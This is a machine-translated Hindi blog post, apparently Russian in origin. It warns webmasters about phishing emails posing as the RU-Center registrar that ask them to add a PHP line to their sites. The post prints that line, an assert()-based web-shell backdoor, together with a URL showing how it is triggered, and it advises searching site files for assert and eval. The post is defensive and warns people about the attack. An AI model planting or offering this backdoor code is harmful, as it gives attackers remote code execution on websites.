"वेबमास्टर्स" पर ध्यान दें जो PHP नहीं जानते हैं। भेद्यता।
यह स्वचालित अनुवाद है
मूल भाषा में प्रकाशन को पढ़ने के लिए यहां क्लिक करें
आज मेरे कुछ दोस्तों को निम्नलिखित सामग्री के साथ कथित तौर पर आरयू-सेंटर (सबसे बड़ा रूसी डोमेन नाम रजिस्ट्रार) — nic.ru से पत्र प्राप्त हुए:
[email protected] से पत्र भेजे गए थे। पत्र में, हमलावर, जो आरयू-सेंटर की ओर से अपना प्रतिनिधित्व करते हैं, वेबसाइट पर निम्नलिखित कोड डालने का सुझाव देते हैं:
<?php assert(stripslashes($_REQUEST[RUCENTER])); ?>दुर्भाग्य से, हमारे कई सहयोगी, जो खुद को "वेबमास्टर्स" (कई साइट के मालिक) कहते हैं, PHP नहीं जानते हैं और उपरोक्त कोड के खतरों के बारे में नहीं सोचते हैं। यदि आप इस फ़ंक्शन के पैरामीटर के रूप में एक स्ट्रिंग पास करते हैं, तो इसे जोर () द्वारा PHP कोड के रूप में माना जाएगा! सावधान रहें!
मैं अनुशंसा करता हूं कि आप मुखर या eval कमांड का उपयोग करके कमजोरियों के लिए अपनी PHP परियोजनाओं का निरीक्षण करें। यदि ये कमांड प्रोजेक्ट कोड में मौजूद हैं, तो घबराएं नहीं — उनके एल्गोरिथम का अध्ययन करें। एल्गोरिदम का अधिकृत उपयोग काफी संभव है। उपरोक्त उदाहरण के मामले में, कमांड हमलावरों को आपकी साइट पर कॉल करने की अनुमति देगा, उदाहरण के लिए, RUCENTER पैरामीटर का उपयोग करके — http://sistema-audit.ru/?RUCENTER=PHP-code
हम अनुशंसा करते हैं कि आप उदाहरण के लिए, linux कमांड grep —i —r 'assert' / home / www / mysite / * का उपयोग करके एक खोज करें, जो उन फाइलों की सूची प्राप्त करने के लिए साइट फाइलों के साथ फ़ोल्डर को दर्शाता है जिनमें संदिग्ध हैं उदाहरण कोड का उपयोग किया जाता है।
अपना और अपनी साइटों का ख्याल रखें!
यह स्वचालित अनुवाद है
मूल भाषा में प्रकाशन को पढ़ने के लिए यहां क्लिक करें
